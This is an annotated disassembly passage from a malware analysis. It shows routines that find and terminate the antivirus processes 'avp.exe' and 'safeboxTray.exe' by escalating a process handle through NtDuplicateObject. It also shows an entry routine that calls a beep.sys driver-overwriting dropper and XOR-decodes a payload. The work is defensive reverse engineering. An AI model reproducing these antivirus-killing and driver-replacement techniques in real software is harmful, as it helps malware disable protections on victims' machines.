seg004:1315075E mov eax, [ebp-2Ch]
seg004:13150761 push eax ; "safeboxTray.exe"
seg004:13150762
seg004:13150762 loc_13150762:
seg004:13150762 call ebx ; lstrcmpiA(name, pe.szExeFile)
seg004:13150764 test eax, eax
seg004:13150766 jnz short loc_131507A2 ; no match -> try second target
seg004:13150768 mov esi, [ebp-174h] ; esi = pe.th32ProcessID (offset 8)
seg004:1315076E push esi ; dwProcessId
seg004:1315076F push 0 ; bInheritHandle = FALSE
seg004:13150771 push 400h ; dwDesiredAccess = PROCESS_QUERY_INFORMATION only (low-privilege open)
seg004:13150776 call dword ptr [ebp-54h] ; OpenProcess(0x400, FALSE, pid)
seg004:13150779 mov [ebp-34h], eax ; [ebp-34h] = process handle
seg004:1315077C cmp dword ptr [ebp-34h], 0
seg004:13150780
seg004:13150780 loc_13150780:
seg004:13150780 jbe short loc_131507A2 ; NULL -> skip
seg004:13150782 push 1 ; Options = DUPLICATE_CLOSE_SOURCE
seg004:13150784 push 0 ; HandleAttributes = 0
seg004:13150786
seg004:13150786 loc_13150786:
seg004:13150786 push 1F0FFFh ; DesiredAccess = PROCESS_ALL_ACCESS
seg004:1315078B lea eax, [ebp-34h]
seg004:1315078E push eax ; TargetHandle = &[ebp-34h] (overwrites the weak handle in place)
seg004:1315078F push 0FFFFFFFFh ; TargetProcessHandle = NtCurrentProcess()
seg004:13150791 push dword ptr [ebp-34h] ; SourceHandle = weak handle
seg004:13150794 push 0FFFFFFFFh ; SourceProcessHandle = NtCurrentProcess()
seg004:13150796 call dword ptr [ebp-38h] ; NtDuplicateObject: escalate to PROCESS_ALL_ACCESS; NTSTATUS ignored
seg004:13150799 push 0 ; uExitCode = 0
seg004:1315079B mov eax, [ebp-34h]
seg004:1315079E push eax ; hProcess (escalated)
seg004:1315079F
seg004:1315079F loc_1315079F:
seg004:1315079F call dword ptr [ebp-40h] ; TerminateProcess(h, 0); handle h is never closed
seg004:131507A2
seg004:131507A2 loc_131507A2: ; CODE XREF: seg004:13150766j
seg004:131507A2 ; seg004:loc_13150780j
seg004:131507A2 lea eax, [ebp-158h] ; &pe.szExeFile
seg004:131507A8 push eax
seg004:131507A9 mov eax, [ebp-30h]
seg004:131507AC push eax ; "avp.exe"
seg004:131507AD call ebx ; lstrcmpiA(name, pe.szExeFile)
seg004:131507AF test eax, eax
seg004:131507B1 jnz short loc_131507ED ; no match -> next process
seg004:131507B3 mov esi, [ebp-174h] ; pid
seg004:131507B9 push esi
seg004:131507BA push 0
seg004:131507BC push 400h ; PROCESS_QUERY_INFORMATION
seg004:131507C1 call dword ptr [ebp-54h] ; OpenProcess -- same sequence as above
seg004:131507C4 mov [ebp-34h], eax
seg004:131507C7 cmp dword ptr [ebp-34h], 0
seg004:131507CB jbe short loc_131507ED
seg004:131507CD push 1 ; DUPLICATE_CLOSE_SOURCE
seg004:131507CF push 0
seg004:131507D1 push 1F0FFFh ; PROCESS_ALL_ACCESS
seg004:131507D6 lea eax, [ebp-34h]
seg004:131507D9 push eax
seg004:131507DA push 0FFFFFFFFh
seg004:131507DC push dword ptr [ebp-34h]
seg004:131507DF push 0FFFFFFFFh
seg004:131507E1 call dword ptr [ebp-38h] ; NtDuplicateObject: escalate handle
seg004:131507E4 push 0
seg004:131507E6 mov eax, [ebp-34h]
seg004:131507E9 push eax
seg004:131507EA call dword ptr [ebp-40h] ; TerminateProcess(h, 0); handle leaked
seg004:131507ED
seg004:131507ED loc_131507ED: ; CODE XREF: seg004:131507B1j
seg004:131507ED ; seg004:131507CBj
seg004:131507ED lea eax, [ebp-17Ch]
seg004:131507F3 push eax
seg004:131507F4 push edi
seg004:131507F5 call dword ptr [ebp-4Ch] ; Process32Next(snap, &pe)
seg004:131507F8 test eax, eax
seg004:131507FA jnz loc_13150757 ; more entries -> loop
seg004:13150800 push edi
seg004:13150801 call dword ptr [ebp-50h] ; CloseHandle(snapshot)
seg004:13150804
seg004:13150804 loc_13150804: ; CODE XREF: seg004:13150621j
seg004:13150804 ; seg004:loc_131506E3j
seg004:13150804 pop edi
seg004:13150805 pop esi
seg004:13150806 pop ebx
seg004:13150807 mov esp, ebp
seg004:13150809 pop ebp
seg004:1315080A retn
; ---------------------------------------------------------------------------
; Routine 3 -- loc_1315080C: entry point that drives routines 1 and 2.
; Calling convention: stdcall with one stack argument (retn 4).
;   [ebp+8] -> parameter block, used as:
;     +0   pointer to a pointer to the "get module by name" function;
;          dereferenced once in place so [blk+0] becomes the function
;          address that routines 1/2 call through [eax]
;     +4   same for the "resolve export" function ([eax+4] in routines 1/2)
;     +8   pointer to a buffer to XOR-decode
;     +0Ch length of that buffer in bytes
;     +14h one-byte XOR key
;   The slots at +0/+4 look like import-table entries resolved in place
;   (presumably LoadLibraryA/GetProcAddress) -- confirm at the caller.
; Flow visible below:
;   1. resolve kernel32!GetVersion and user32!MessageBoxA by name.
;   2. MessageBoxA(hWnd=-1, "kernel32", "user32", 0); the result is
;      discarded and an hWnd of -1 is not a valid window, so this is
;      likely a no-op decoy or sandbox probe rather than a real prompt.
;   3. if GetVersion() < 80000000h (high bit clear = Windows NT family,
;      not 9x/ME): run the process killer (routine 2) twice, then the
;      beep.sys driver dropper (routine 1).  On 9x/ME all three are skipped.
;   4. XOR-decode [blk+8] over [blk+0Ch] bytes with key [blk+14h].
;   `int 2Eh` appears twice; IDA's "DOS EXECUTE COMMAND" annotation is a
;   16-bit artefact and wrong here -- on 32-bit NT int 2Eh is the legacy
;   system-call gate.  eax is not set up as a service number before either
;   one, so they are most plausibly junk / anti-emulation; confirm under a
;   debugger before relying on any interpretation.
; ---------------------------------------------------------------------------
seg004:1315080C loc_1315080C:
seg004:1315080C push ebp
seg004:1315080D mov ebp, esp
seg004:1315080F add esp, 0FFFFFFECh ; esp -= 14h: five dword locals
seg004:13150812 push ebx
seg004:13150813 push esi
seg004:13150814 push edi
seg004:13150815 mov ebx, [ebp+8] ; ebx = parameter block
seg004:13150818 mov eax, [ebx]
seg004:1315081A mov eax, [eax]
seg004:1315081C mov [ebx], eax ; [blk+0] = **slot -> loader function address
seg004:1315081E mov eax, [ebx+4]
seg004:13150821 mov eax, [eax]
seg004:13150823 mov [ebx+4], eax ; [blk+4] = **slot -> resolver function address
seg004:13150826 call loc_13150834 ; call/pop string fetch (as in routines 1/2)
seg004:1315082B aKernel32_1 db 'kernel32',0
seg004:13150834
seg004:13150834 loc_13150834: ; CODE XREF: seg004:13150826p
seg004:13150834 pop dword ptr [ebp-4] ; [ebp-4] = "kernel32"
seg004:13150837 call loc_13150847
seg004:1315083C aGetversion db 'GetVersion',0
seg004:13150847
seg004:13150847 loc_13150847: ; CODE XREF: seg004:13150837p
seg004:13150847 pop dword ptr [ebp-8] ; [ebp-8] = "GetVersion"
seg004:1315084A call loc_13150856
seg004:1315084F aUser32 db 'user32',0
seg004:13150856
seg004:13150856 loc_13150856: ; CODE XREF: seg004:1315084Ap
seg004:13150856 pop dword ptr [ebp-0Ch] ; [ebp-0Ch] = "user32"
seg004:13150859 call loc_1315086A
seg004:1315085E aMessageboxa_0 db 'MessageBoxA',0
seg004:1315086A
seg004:1315086A loc_1315086A: ; CODE XREF: seg004:13150859p
seg004:1315086A pop dword ptr [ebp-10h] ; [ebp-10h] = "MessageBoxA"
seg004:1315086D int 2Eh ; NT legacy syscall gate, not a DOS call (IDA mislabel); eax not prepared -> likely junk/anti-emulation, verify
seg004:1315086D ; (original IDA auto-comment "DOS 2+ internal - EXECUTE COMMAND" does not apply to 32-bit NT code)
seg004:1315086F mov eax, [ebp-4]
seg004:13150872 push eax
seg004:13150873 call dword ptr [ebx] ; esi = loader("kernel32")
seg004:13150875 mov esi, eax
seg004:13150877 test esi, esi
seg004:13150879 jz short loc_131508ED ; no kernel32 -> exit without touching anything
seg004:1315087B mov eax, [ebp-8]
seg004:1315087E push eax
seg004:1315087F push esi
seg004:13150880 call dword ptr [ebx+4] ; resolve(kernel32, "GetVersion")
seg004:13150883 mov edi, eax ; edi = GetVersion
seg004:13150885
seg004:13150885 loc_13150885:
seg004:13150885 mov eax, [ebp-0Ch]
seg004:13150888 push eax
seg004:13150889 call dword ptr [ebx] ; esi = loader("user32")
seg004:1315088B mov esi, eax
seg004:1315088D test esi, esi
seg004:1315088F jz short loc_131508ED
seg004:13150891 mov eax, [ebp-10h]
seg004:13150894 push eax
seg004:13150895 push esi
seg004:13150896 call dword ptr [ebx+4] ; resolve(user32, "MessageBoxA")
seg004:13150899 mov [ebp-14h], eax ; [ebp-14h] = MessageBoxA
seg004:1315089C push 0 ; uType = MB_OK
seg004:1315089E mov eax, [ebp-0Ch]
seg004:131508A1 push eax ; lpCaption = "user32"
seg004:131508A2 mov eax, [ebp-4]
seg004:131508A5 push eax ; lpText = "kernel32"
seg004:131508A6 push 0FFFFFFFFh ; hWnd = -1 (not a valid window handle)
seg004:131508A8 call dword ptr [ebp-14h] ; MessageBoxA(-1, "kernel32", "user32", 0); return value discarded
seg004:131508AB call edi ; eax = GetVersion()
seg004:131508AD cmp eax, 80000000h ; high bit clear -> NT family
seg004:131508B2 setb al
seg004:131508B5 test al, al
seg004:131508B7 jz short loc_131508D6 ; Win9x/ME: skip killer and dropper
seg004:131508B9 mov eax, ebx ; eax = parameter block doubles as the loader table for the callees
seg004:131508BB call loc_1315059C ; routine 2: kill safeboxTray.exe / avp.exe
seg004:131508C0 nop
seg004:131508C1 nop
seg004:131508C2 nop
seg004:131508C3 nop
seg004:131508C4 mov eax, ebx
seg004:131508C6 call loc_1315059C ; routine 2 again (second pass over the process list)
seg004:131508CB nop
seg004:131508CC nop
seg004:131508CD nop
seg004:131508CE nop
seg004:131508CF mov eax, ebx
seg004:131508D1
seg004:131508D1 loc_131508D1:
seg004:131508D1 call loc_1314F6C0 ; routine 1: overwrite beep.sys and restart the BEEP service
seg004:131508D6
seg004:131508D6 loc_131508D6: ; CODE XREF: seg004:131508B7j
seg004:131508D6 mov esi, [ebx+8] ; esi = buffer to decode
seg004:131508D9 mov dl, [ebx+14h] ; dl = XOR key byte
seg004:131508DC mov eax, [ebx+0Ch] ; eax = length
seg004:131508DF dec eax
seg004:131508E0 test eax, eax ; TEST clears CF, so the JB below is never taken
seg004:131508E2 jb short loc_131508EB ; dead branch: a zero length would wrap and loop 2^32 times
seg004:131508E4 inc eax ; counted loop runs `length` times
seg004:131508E5
seg004:131508E5 loc_131508E5: ; CODE XREF: seg004:131508E9j
seg004:131508E5 xor [esi], dl ; in-place single-byte XOR decode
seg004:131508E7 inc esi
seg004:131508E8 dec eax
seg004:131508E9 jnz short loc_131508E5
seg004:131508EB
seg004:131508EB loc_131508EB: ; CODE XREF: seg004:131508E2j
seg004:131508EB int 2Eh ; second NT syscall-gate instruction with no service number set up; likely junk/anti-emulation, verify
seg004:131508EB ; (IDA's DOS annotation is a 16-bit artefact and does not describe this 32-bit code)
seg004:131508ED
seg004:131508ED loc_131508ED: ; CODE XREF: seg004:13150879j
seg004:131508ED ; seg004:1315088Fj
seg004:131508ED pop edi
seg004:131508EE pop esi
seg004:131508EF pop ebx
seg004:131508F0 mov esp, ebp
seg004:131508F2 pop ebp
seg004:131508F3 retn 4 ; stdcall: pops the single parameter-block argument